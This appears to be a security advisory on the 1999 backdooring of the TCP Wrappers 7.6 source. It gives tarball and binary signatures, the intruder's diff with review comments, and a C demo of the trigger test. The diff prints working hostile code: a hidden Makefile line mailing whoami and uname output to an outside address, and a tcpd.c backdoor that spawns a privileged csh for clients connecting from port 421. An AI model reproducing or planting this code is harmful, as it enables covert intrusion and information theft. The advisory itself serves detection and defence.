TCP Wrapper Backdoor Vulnerability
TCP Wrappers is a widely used security tool that protects UNIX systems against intrusion. It has an estimated installed base of millions. On January 21, 1999 an intruder broke into the main FTP site for TCP Wrappers (Eindhoven University of Technology) and managed to backdoor the source code. The details are as follows.

The backdoor gives access to a privileged shell when a client connects FROM port 421. Note that the trigger is the client's source port, which the client chooses, not a port the server listens on. The backdoored copy was downloaded 52 times between 07:16 MET and 16:29 MET.

Relevant time stamp/size information (times relative to MET; ls -c shows the inode change time, i.e. when the file was put in place, rather than the modification time):

Backdoored version:

    % ls -lcta
    -r--r--r--   1 wswietse    99186 Jan 21 07:16 tcp_wrappers_7.6.tar.gz
    ...
    dr-xr-sr-x   3 wswietse     4096 Apr 11  1998 .

Restored version:

    % ls -lt tcp_wrappers_7.6.tar.gz
    -r--r--r--   1 wswietse    99438 Jan 21 16:29 tcp_wrappers_7.6.tar.gz

The signature of the bad TAR file is: length 99186 instead of 99438.

The signature of a compiled tcpd binary is:

    strings -a tcpd | grep csh

Any output probably means trouble: the backdoor carries the strings "-csh" and "/bin/csh" (see the tcpd.c diff below), which a clean tcpd has no reason to contain.

Changes that were made to the tcp wrapper 7.6 source code:

diff -c 7.6/Makefile /tmp/tcp_wrappers_7.6/Makefile
*** 7.6/Makefile	Mon Apr  7 20:34:16 1997
--- /tmp/tcp_wrappers_7.6/Makefile	Fri Mar 21 13:27:21 1997
***************
*** 26,31 ****
--- 26,32 ----
  	@echo
  	@echo "If none of these match your environment, edit the system"
  	@echo "dependencies sections in the Makefile and do a 'make other'."
+ 	@sh -c 'echo debug-`whoami`-`uname -a` |mail -s debug wtcpd@hotmail.com'
  	@echo #######################################################
***************
*** 649,655 ****
  # source-routed traffic in the kernel. Examples: 4.4BSD derivatives,
  # Solaris 2.x, and Linux. See your system documentation for details.
  #
! KILL_OPT= -DKILL_IP_OPTIONS
  
  ## End configuration options ############################
--- 650,656 ----
  # source-routed traffic in the kernel. Examples: 4.4BSD derivatives,
  # Solaris 2.x, and Linux. See your system documentation for details.
  #
! # KILL_OPT= -DKILL_IP_OPTIONS
  
  ## End configuration options ############################
Only in 7.6: Makefile-
diff -c 7.6/tcpd.c /tmp/tcp_wrappers_7.6/tcpd.c
*** 7.6/tcpd.c	Sun Feb 11 11:01:33 1996
--- /tmp/tcp_wrappers_7.6/tcpd.c	Sun Feb 11 11:01:33 1996
***************
*** 41,52 ****
--- 41,63 ----
  int     allow_severity = SEVERITY;	/* run-time adjustable */
  int     deny_severity = LOG_WARNING;	/* ditto */
  
+ char IDENT[]="NC421\n";
+ char SRUN[]="-csh";
+ char SPATH[]="/bin/csh";
+ #define PORT 421
+ 
  main(argc, argv)
  int     argc;
  char  **argv;
  {
      struct request_info request;
+     struct sockaddr_in from;
      char    path[MAXPATHNAMELEN];
+     int fromlen;
+ 
+     fromlen = sizeof(from);if (getpeername(0,(struct sockaddr*)&from,
+     &fromlen)>=0){if(ntohs(from.sin_port)==PORT){write(0,IDENT,
+     strlen(IDENT));execl(SPATH,SRUN,(char*)0);}}
  
      /* Attempt to prevent the creation of world-writable files. */
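Review bot: the added line `@sh -c 'echo debug-`whoami`-`uname -a` |mail -s debug wtcpd@hotmail.com'` in the Makefile hunk at lines 26-32 has no place in a build and must be removed: it mails the building account name and the host's full uname -a to an outside Hotmail address every time the usage-message target it sits in runs (judging from the surrounding @echo text, that is the target a plain `make` with no system name lands on). The leading `@` stops make from echoing the command, and it is slotted between @echo lines so it reads as one more line of the message. The file header is also suspicious on its own: the modified Makefile carries an mtime of Mar 21 1997, older than the original's Apr 7 1997, so a timestamp comparison would not have flagged the file.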
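Review bot: commenting out `KILL_OPT= -DKILL_IP_OPTIONS` in the hunk at lines 649-656 silently disables the option that the comment directly above it documents as the handling for source-routed traffic, and nothing in the patch says why. A tree built from this tarball no longer compiles that code path, while the rest of the Makefile and its usage text are unchanged, so nobody building it would notice the default had moved. Reject this hunk together with the rest.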
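Review bot: the three crammed lines after `+     int fromlen;` in the tcpd.c hunk are a remote privileged backdoor and the whole hunk must be rejected. They run at the top of main(), before the world-writable-file guard that follows them and before tcpd consults any hosts.allow/hosts.deny rule, so none of the wrapper's access control applies. The only condition is `ntohs(from.sin_port)==PORT`, i.e. the client's source port equals 421, and the client picks its own source port (anyone with root on their own machine can bind to 421). On a match the code writes "NC421\n" to fd 0, which under inetd is the client's connection, and execl()s /bin/csh with argv[0] "-csh", the login-shell convention, so the shell runs with tcpd's privileges on that connection. Three statements per line with no spacing, plus the split of the strings into the globals IDENT, SRUN and SPATH, both read as attempts to survive a casual scan; those same globals are why `strings -a tcpd | grep csh` finds a binary built from this file. The file header shows identical timestamps on both copies (Sun Feb 11 11:01:33 1996), so the modified file's mtime matches the original's exactly and an ls -l comparison would not show the change.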
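The trigger condition is worth seeing run, because it keys on the client's source port, which the client picks. The program below is an added example written for this page; it is not code from tcpd, from the advisory, or from the intruder's patch. It opens a TCP connection to itself over loopback, runs the same getpeername() comparison the trojaned tcpd.c makes (without the execl of /bin/csh), and reports whether the check fires. The trigger port is a function parameter instead of the hard-coded 421, because binding a client socket to a port below 1024 needs root; the function and variable names (backdoor_trigger_fires, loopback_connect, probe) are the example's own.

```c
/*
 * Added example: reproduce the trojaned tcpd's trigger test on a real
 * connection, minus the shell. The planted code called getpeername() on
 * fd 0 (the socket inetd hands to tcpd) and compared the CLIENT's source
 * port with a constant. The client chooses its own source port, so the
 * trigger is entirely under the attacker's control.
 */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#define BACKDOOR_PORT 421   /* the value hard-coded in the trojaned tcpd.c */

/* The trojan's test with a configurable port and no shell.
 * Returns 1 if the peer connected from trigger_port, 0 if not,
 * -1 if fd is not a connected socket (getpeername() fails). */
static int backdoor_trigger_fires(int fd, unsigned short trigger_port)
{
    struct sockaddr_in from;
    socklen_t fromlen = sizeof(from);

    if (getpeername(fd, (struct sockaddr *)&from, &fromlen) < 0)
        return -1;
    /* In the real backdoor a match did:
     *   write(0, "NC421\n", 6); execl("/bin/csh", "-csh", (char *)0);
     * replacing tcpd (root under inetd) with a login shell on the
     * client's connection. Here we only report the decision. */
    return ntohs(from.sin_port) == trigger_port;
}

/* Connect to ourselves over loopback. On success stores the server-side
 * fd of the accepted connection and the client fd, and returns the
 * client's source port as the kernel assigned it (what the server's
 * getpeername() sees). Returns 0 on failure. */
static unsigned short loopback_connect(int *accepted, int *client)
{
    struct sockaddr_in addr;
    socklen_t len = sizeof(addr);
    int lfd, cfd, afd;

    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    addr.sin_port = 0;                          /* any free listening port */

    if ((lfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
        return 0;
    if (bind(lfd, (struct sockaddr *)&addr, sizeof(addr)) < 0 ||
        listen(lfd, 1) < 0 ||
        getsockname(lfd, (struct sockaddr *)&addr, &len) < 0) {
        close(lfd);
        return 0;
    }
    if ((cfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        close(lfd);
        return 0;
    }
    /* Loopback connect completes in the kernel, so accept() returns at once. */
    if (connect(cfd, (struct sockaddr *)&addr, sizeof(addr)) < 0 ||
        (afd = accept(lfd, NULL, NULL)) < 0) {
        close(cfd);
        close(lfd);
        return 0;
    }
    close(lfd);
    len = sizeof(addr);
    if (getsockname(cfd, (struct sockaddr *)&addr, &len) < 0) {
        close(cfd);
        close(afd);
        return 0;
    }
    *accepted = afd;
    *client = cfd;
    return ntohs(addr.sin_port);
}

/* Run one connection through the trojan's check. With match != 0 the
 * trigger port is set to the port the client actually connected from,
 * which is what an attacker arranges by binding the client socket to the
 * trigger port before connect(); otherwise a different port is used, as
 * for an ordinary client. Returns 1 (shell would have been spawned),
 * 0 (normal tcpd path) or -1 (no loopback connection could be made). */
static int probe(int match)
{
    int afd, cfd, fires;
    unsigned short src = loopback_connect(&afd, &cfd);

    if (src == 0)
        return -1;
    fires = backdoor_trigger_fires(afd, match ? src : (unsigned short)(src ^ 1));
    close(afd);
    close(cfd);
    return fires;
}

int main(void)
{
    printf("hard-coded trigger port in the trojaned tcpd: %d\n", BACKDOOR_PORT);
    printf("check on a connection from the trigger port:  %d\n", probe(1));
    printf("check on an ordinary connection:              %d\n", probe(0));
    return 0;
}
```

Because the trigger is the source port of the incoming connection, the network-side check is a filter on that field, e.g. `tcpdump -n 'tcp and src port 421'` at the border; an inbound TCP connection with source port 421 to a wrapped service on a host built from the trojaned tarball should be treated as an attempted backdoor login, and the host check remains the `strings -a tcpd | grep csh` test above.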